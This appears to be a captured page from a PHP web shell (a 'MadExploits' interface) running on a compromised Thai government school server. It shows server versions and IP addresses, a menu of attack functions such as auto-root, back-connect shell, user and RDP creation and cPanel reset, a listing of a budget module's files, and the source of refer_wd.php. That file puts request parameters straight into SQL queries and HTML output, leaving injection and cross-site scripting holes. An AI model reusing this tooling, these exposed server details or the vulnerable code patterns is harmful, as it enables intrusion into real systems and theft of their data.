Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
budget /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
approve.php
20.37
KB
-rwxr-xr-x
approve_reserve.php
17.03
KB
-rwxr-xr-x
bud_book.php
15.15
KB
-rwxr-xr-x
budget_year.php
10.7
KB
-rwxr-xr-x
cancel_deega.php
12.45
KB
-rwxr-xr-x
cash_book.php
15.49
KB
-rwxr-xr-x
change_bud.php
19.67
KB
-rwxr-xr-x
change_ex_bud.php
22.41
KB
-rwxr-xr-x
change_income_bud.php
22.66
KB
-rwxr-xr-x
ex_bud_book.php
14.92
KB
-rwxr-xr-x
form1.php
14.16
KB
-rwxr-xr-x
form2.php
12.49
KB
-rwxr-xr-x
income_bud_book.php
14.99
KB
-rwxr-xr-x
livesearch.php
1.64
KB
-rwxr-xr-x
pay_bud.php
25.02
KB
-rwxr-xr-x
pay_check.php
25.89
KB
-rwxr-xr-x
pay_check_reserve.php
19.29
KB
-rwxr-xr-x
pay_ex_bud.php
29.83
KB
-rwxr-xr-x
pay_income_bud.php
22.75
KB
-rwxr-xr-x
permission.php
18.38
KB
-rwxr-xr-x
print_check.php
3.71
KB
-rwxr-xr-x
receive_bud.php
19.66
KB
-rwxr-xr-x
receive_ex_bud.php
24.18
KB
-rwxr-xr-x
receive_income_bud.php
24.01
KB
-rwxr-xr-x
refer_deega.php
8.07
KB
-rwxr-xr-x
refer_wd.php
9.41
KB
-rwxr-xr-x
report_1.php
12.31
KB
-rwxr-xr-x
report_10.php
6.31
KB
-rwxr-xr-x
report_10_2.php
8.67
KB
-rwxr-xr-x
report_10_3.php
7.79
KB
-rwxr-xr-x
report_10_4.php
7.17
KB
-rwxr-xr-x
report_12.php
10.69
KB
-rwxr-xr-x
report_12_2.php
6.12
KB
-rwxr-xr-x
report_12_3.php
7.82
KB
-rwxr-xr-x
report_13.php
9.17
KB
-rwxr-xr-x
report_1_mobile.php
11.19
KB
-rwxr-xr-x
report_2.php
6.39
KB
-rwxr-xr-x
report_21.php
17.04
KB
-rwxr-xr-x
report_23.php
8.06
KB
-rwxr-xr-x
report_3.php
9.5
KB
-rwxr-xr-x
report_4.php
6.38
KB
-rwxr-xr-x
report_5.php
5.96
KB
-rwxr-xr-x
report_8.php
6.5
KB
-rwxr-xr-x
report_9.php
8.54
KB
-rwxr-xr-x
report_pay_check.php
15.89
KB
-rwxr-xr-x
report_pay_check_reserve.php
13.11
KB
-rwxr-xr-x
reserve_money.php
29.05
KB
-rwxr-xr-x
return_ajax_proj.php
1.06
KB
-rwxr-xr-x
return_ajax_proj_2.php
859
B
-rw-r--r--
return_withdraw.php
26.73
KB
-rwxr-xr-x
today_report.php
16.29
KB
-rwxr-xr-x
withdraw.php
47.57
KB
-rwxr-xr-x
withdraw2.php
40.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : refer_wd.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); $t_month['01']="มค"; $t_month['02']="กพ"; $t_month['03']="มีค"; $t_month['04']="เมย"; $t_month['05']="พค"; $t_month['06']="มิย"; $t_month['07']="กค"; $t_month['08']="สค"; $t_month['09']="กย"; $t_month['10']="ตค"; $t_month['11']="พย"; $t_month['12']="ธค"; //ปีงบประมาณ $sql = "select * from budget_year where year_active='1' order by budget_year desc limit 1"; $dbquery = mysqli_query($connect,$sql); $year_active_result = mysqli_fetch_array($dbquery); if($year_active_result['budget_year']==""){ echo "<br />"; echo "<div align='center'>ยังไม่ได้กำหนดทำงานในปีงบประมาณใด ๆ กรุณาไปที่เมนูตั้งค่าระบบ เพื่อกำหนดปีงบประมาณ</div>"; exit(); } //ส่วนหัว echo "<br />"; echo "<table width='50%' border='0' align='center'>"; echo "<tr align='center'><td><font color='#006666' size='3'><strong>ทะเบียน ขอเบิก/ขอยืมเงิน ปีงบประมาณ$year_active_result[budget_year]</strong></font></td></tr>"; echo "</table>"; //ส่วนแสดงรายละเอียด $sql = "select * from budget_withdraw where id='$_GET[id]' "; $dbquery = mysqli_query($connect,$sql); While ($result = mysqli_fetch_array($dbquery)) { $id = $result['id']; $document= $result['document']; $item= $result['item']; $pj_activity= $result['pj_activity']; $money= $result['money']; $money=number_format($money,2); $pay_type= $result['pay_type']; $p_request= $result['p_request']; $borrow_status= $result['borrow_status']; $withdraw_status= $result['withdraw_status']; $officer= $result['officer']; $rec_date= $result['rec_date']; $borrowed_rec_date= $result['borrowed_rec_date']; $withdraw_rec_date= $result['withdraw_rec_date']; //ส่วนแสดงแหล่งงบประมาณ $sql_acti = "select * from plan_acti where code_acti='$pj_activity' and budget_year='$year_active_result[budget_year]'"; $dbquery_acti = mysqli_query($connect, $sql_acti); $result_acti = mysqli_fetch_array($dbquery_acti); list($type,$code_approve_index)=explode("_",$result_acti[code_approve]); if($type==1){ $sql_type = "select * from budget_type where budget_year='$year_active_result[budget_year]' and type_id='$code_approve_index'"; $dbquery_type = mysqli_query($connect,$sql_type); $result_type = mysqli_fetch_array($dbquery_type); $money_source="เงินนอกงบประมาณ $code_approve_index $result_type[type_name]"; } elseif($type==2){ $sql_type = "select num, item from budget_receive where budget_year='$year_active_result[budget_year]' and num='$code_approve_index'"; $dbquery_type = mysqli_query($connect,$sql_type); $result_type = mysqli_fetch_array($dbquery_type); $money_source="เงินงบประมาณงวดที่ $code_approve_index $result_type[item]"; } } list($rec_year,$rec_month,$rec_day) = explode("-",$rec_date); $t_year=($rec_year+543); $to_date=$rec_day.$t_month[$rec_month].$t_year; //echo "<Br>"; echo "<Table align='center' width='70%' Border='0' Bgcolor='#Fcf9d8'>"; echo "<Tr ><Td colspan='7' align='right'><INPUT TYPE='button' name='smb' value='<<กลับหน้าก่อน' onclick='location.href=\"?option=budget&task=main/$_GET[back_page]&page=$_GET[page]\"'></Td></Tr>"; echo "<Tr align='left'><Td width='20'></Td><Td align='right'>วดป ลงทะเบียน </Td><Td><Input Type='Text' Name='' Size='10' value='$to_date' readonly></Td></Tr>"; echo "<Tr align='left'><Td ></Td><Td align='right'>ที่เอกสาร </Td><Td><Input Type='Text' Name='doc' id='doc' Size='20' value='$document' readonly></Td></Tr>"; if($withdraw_status==4){ $withdraw_check="checked"; } else{ $withdraw_check=""; } if($borrow_status==1){ $check1="checked"; $check2=""; $check3=""; } elseif($borrow_status==2){ $check1=""; $check2="checked"; $check3=""; } elseif($borrow_status==3){ $check1=""; $check2=""; $check3="checked"; } else{ $check1=""; $check2=""; $check3=""; } echo "<tr><Td ></Td><td align='right'>ขอยืมเงินงบประมาณ </td>"; echo "<td align='left'><input type=radio name='status' value='1' $check1 >"; if($borrow_status==1){ echo " ปี(คศ)เดือนวัน <Input Type='Text' Name='borrowed_rec_date' Size='10' value='$borrowed_rec_date'>"; } echo "<tr><Td ></Td><td align='right'>ขอยืมเงินนอกงบประมาณ </td>"; echo "<td align='left'><input type=radio name='status' value='2' $check2>"; if($borrow_status==2){ echo " ปี(คศ)เดือนวัน <Input Type='Text' Name='borrowed_rec_date' Size='10' value='$borrowed_rec_date'>"; } echo "<tr><Td ></Td><td align='right'>ขอยืมเงินทดรองราชการ </td>"; echo "<td align='left'><input type=radio name='status' value='3' $check3>"; if($borrow_status==3){ echo " ปี(คศ)เดือนวัน <Input Type='Text' Name='borrowed_rec_date' Size='10' value='$borrowed_rec_date'>"; } echo "</td></tr>"; echo "<tr><Td></Td><td align='right'>ขอเบิก </td>"; echo "<td align='left'><input type=radio name='withdraw_status' value='4' $withdraw_check>ใช่<input type=radio name='withdraw_status' value='0'>ไม่ใช่"; if($withdraw_status==4){ echo " ปี(คศ)เดือนวัน <Input Type='Text' Name='withdraw_rec_date' Size='10' value='$withdraw_rec_date'>"; } echo "<Tr align='left'><Td width='20'></Td><Td align='right'>รายการ </Td><Td><Input Type='Text' Name='item' Size='50' value='$item' readonly></Td></Tr>"; $sql = "select * from plan_acti where code_acti='$pj_activity' "; //หารหัสโครงการ $dbquery = mysqli_query($connect,$sql); $acti_result = mysqli_fetch_array($dbquery); echo "<Tr align='left'><Td ></Td><Td align='right'>โครงการ </Td>"; echo "<td><div align='left'><Select name='proj' size='1'>"; echo "<option value = ''>เลือก</option>" ; $sql = "select * from plan_proj where budget_year='$year_active_result[budget_year]' order by code_proj"; $dbquery = mysqli_query($connect,$sql); While ($result = mysqli_fetch_array($dbquery)) { $code_proj = $result['code_proj']; $name_proj = $result['name_proj']; $name_proj = substr($name_proj,0,120)."..."; if($code_proj==$acti_result['code_proj']){ echo "<option value = $code_proj selected>$code_proj $name_proj</option>" ; } } echo "</select>"; echo "</div></td></tr>"; echo "<Tr align='left'><Td></Td><Td align='right'>กิจกรรม </Td><td align='left'>"; echo "<Select name='pj_activity' id='pj_activity' size='1' >"; echo "<option value = ''>เลือก</option>" ; $sql = "select * from plan_acti where code_proj='$acti_result[code_proj]' and budget_year='$year_active_result[budget_year]'"; $dbquery = mysqli_query($connect,$sql); While ($acti_of_plan_result = mysqli_fetch_array($dbquery)){ if($acti_of_plan_result['code_acti']==$pj_activity){ echo "<option value=$acti_of_plan_result[code_acti] selected>$acti_of_plan_result[code_acti] $acti_of_plan_result[name_acti]</option>" ; } } echo "</select>"; echo "</td></tr>"; echo "<Tr align='left'><Td width='20'></Td><Td align='right'>จำนวนเงิน </Td><Td><Input Type='Text' Name='amount' Size='15' value='$money' readonly> บาท</Td></Tr>"; echo "<Tr align='left'><Td width='20'></Td><Td align='right'>แหล่งเงิน </Td><Td><Input Type='Text' Name='' Size='60' value='$money_source' readonly></Td></Tr>"; echo "<tr><Td ></Td><td align='right'>ประเภทรายการจ่าย </td>"; echo "<td><div align=left><Select name='pay_type' size='1'>"; $sql = "select * from budget_pay_type order by pay_type_id"; $dbquery = mysqli_query($connect,$sql); While ($result = mysqli_fetch_array($dbquery)) { $pay_type_id = $result['pay_type_id']; $pay_type_name = $result['pay_type_name']; if($pay_type_id==$pay_type){ echo "<option value = $pay_type_id selected>$pay_type_name</option>" ; } } echo "</select>"; echo "</div></td></tr>"; echo "<Tr align='left'><Td width='30'></Td><Td align='right'>ผู้ขอเบิก/ขอยืมเงิน </Td><Td><Input Type='Text' Name='p_request' Size='30' value='$p_request' readonly></Td></Tr>"; $sql = "select * from person_main where person_id='$officer' "; $dbquery = mysqli_query($connect,$sql); $result = mysqli_fetch_array($dbquery); $fullname=$result['prename'].$result['name']." ".$result['surname']; echo "<Tr align='left'><Td width='20'></Td><Td align='right'>เจ้าหน้าที่ </Td><Td><Input Type='Text' Name='' Size='30' value='$fullname' readonly></Td></Tr>"; echo "<Br>"; echo "</Table>"; echo "<Br>"; ?>
Close